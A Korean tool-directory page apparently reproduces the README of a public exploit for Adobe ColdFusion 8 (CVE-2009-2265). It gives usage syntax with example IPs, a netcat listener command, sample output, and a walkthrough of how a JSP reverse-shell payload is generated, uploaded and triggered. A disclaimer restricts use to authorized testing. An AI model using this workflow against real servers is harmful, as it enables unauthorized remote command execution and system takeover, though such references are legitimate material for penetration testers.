Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Adobe-ColdFusion-8-RCE-CVE-2009-2265 — Adobe ColdFusion 8 - 원격 명령 실행 (RCE) | Kitploit
도구/GitHubGitHub/0xdtc/adobe-coldfusion-8-rce-cve-2009-2265
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHub0xdtc/adobe-coldfusion-8-rce-cve-2009-2265

Adobe-ColdFusion-8-RCE-CVE-2009-2265

Adobe ColdFusion 8 - 원격 명령 실행 (RCE)

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
11년 전아직 검토되지 않음

Adobe ColdFusion 8 - 원격 명령 실행 (RCE) 익스플로잇

개요

이 익스플로잇은 Adobe ColdFusion 8 (CVE-2009-2265)의 알려진 취약점을 대상으로 합니다. 악의적인 JSP 페이로드를 업로드하여 리버스 셸 연결을 설정함으로써 원격 명령 실행(RCE)을 가능하게 합니다.


익스플로잇 상세 정보

  • CVE: CVE-2009-2265
  • 취약점: Adobe ColdFusion 8에서 파일 업로드 처리 부적절
  • 영향받는 버전: Adobe ColdFusion 8
  • 영향: 공격자가 서버에서 임의 명령을 실행할 수 있음

기능

  1. msfvenom을 사용하여 JSP 페이로드를 자동 생성
  2. 멀티파트 POST 요청을 사용하여 페이로드 업로드
  3. 페이로드를 트리거하여 리버스 셸 설정
  4. 실행 후 로컬 페이로드 파일 자동 정리

사용 방법

이 익스플로잇을 사용하려면 다음이 필요합니다:

  • Kali Linux 머신 또는 유사한 침투 테스트 환경
  • 지정된 포트에서 리스닝을 위한 Netcat 설치
  • 취약한 Adobe ColdFusion 8 서버

명령어 구문

root@kitploit:~
./CVE-2009-2265 -l <LHOST> -p <LPORT> -r <RHOST> -q <RPORT>

인수

  • -l <LHOST>: 로컬 공격자 IP (예: 10.10.16.5)
  • -p <LPORT>: 리버스 셸을 위한 로컬 공격자 포트 (예: 9001)
  • -r <RHOST>: 원격 대상 IP (예: 10.10.10.11)
  • -q <RPORT>: ColdFusion이 실행 중인 원격 대상 포트 (예: 8500)

사용 예시

root@kitploit:~
./CVE-2009-2265 -l 10.10.16.5 -p 9001 -r 10.10.10.11 -q 8500
  1. 공격자 머신에서 리스너 시작:

    root@kitploit:~
    nc -lnvp 9001
    
  2. 적절한 인수와 함께 익스플로잇 실행

  3. 실행 후 페이로드가 리스너로 다시 연결됨


작동 방식

  1. 페이로드 생성:

    • 스크립트가 msfvenom을 사용하여 악의적인 JSP 페이로드 생성
    • 페이로드는 지정된 LHOST 및 LPORT로 리버스 셸을 시작
  2. 페이로드 업로드:

    • POST 요청을 사용하여 취약한 ColdFusion 서버에 페이로드 업로드
  3. 페이로드 트리거:

    • 파일 URL에 GET 요청을 보내 업로드된 페이로드 실행
  4. 리버스 셸 설정:

    • 리버스 셸이 설정되어 공격자가 대상 시스템에 접근할 수 있음

요구 사항

  • 페이로드 생성을 위한 msfvenom
  • 파일 업로드 및 트리거를 위한 curl
  • 리버스 셸 연결 리스닝을 위한 nc (Netcat)

출력 예시

root@kitploit:~
[+] JSP 리버스 셸 페이로드 생성 중...
[+] 페이로드가 'abcd1234-5678-90ef-ghij-1234567890ab.jsp'로 저장되었습니다.
[+] 대상에 페이로드 업로드 중...
[+] 서버 응답:
    <script type="text/javascript">
        window.parent.OnUploadCompleted(0, "/userfiles/file/abcd1234-5678-90ef-ghij-1234567890ab.jsp", "abcd1234-5678-90ef-ghij-1234567890ab.txt", "0");
    </script>
[+] 포트 9001에서 Netcat 리스너가 시작되기를 기다리는 중...
[+] 포트 9001에서 Netcat 리스너가 실행 중임을 감지했습니다!
[+] 페이로드 트리거 시도 중...
[+] 페이로드가 성공적으로 트리거되었습니다. 리버스 셸을 위해 리스너를 확인하세요.
[+] 로컬 파일 정리 중...
[+] 완료!

면책 조항

이 스크립트는 교육 목적으로만 사용됩니다. 소유하거나 테스트할 명시적 권한이 있는 시스템에서만 사용하십시오. 소유하지 않은 시스템에서 이 익스플로잇을 무단 사용하는 것은 불법이며 비윤리적입니다.


저자

개발자: [0xDTC]

도구 다운로드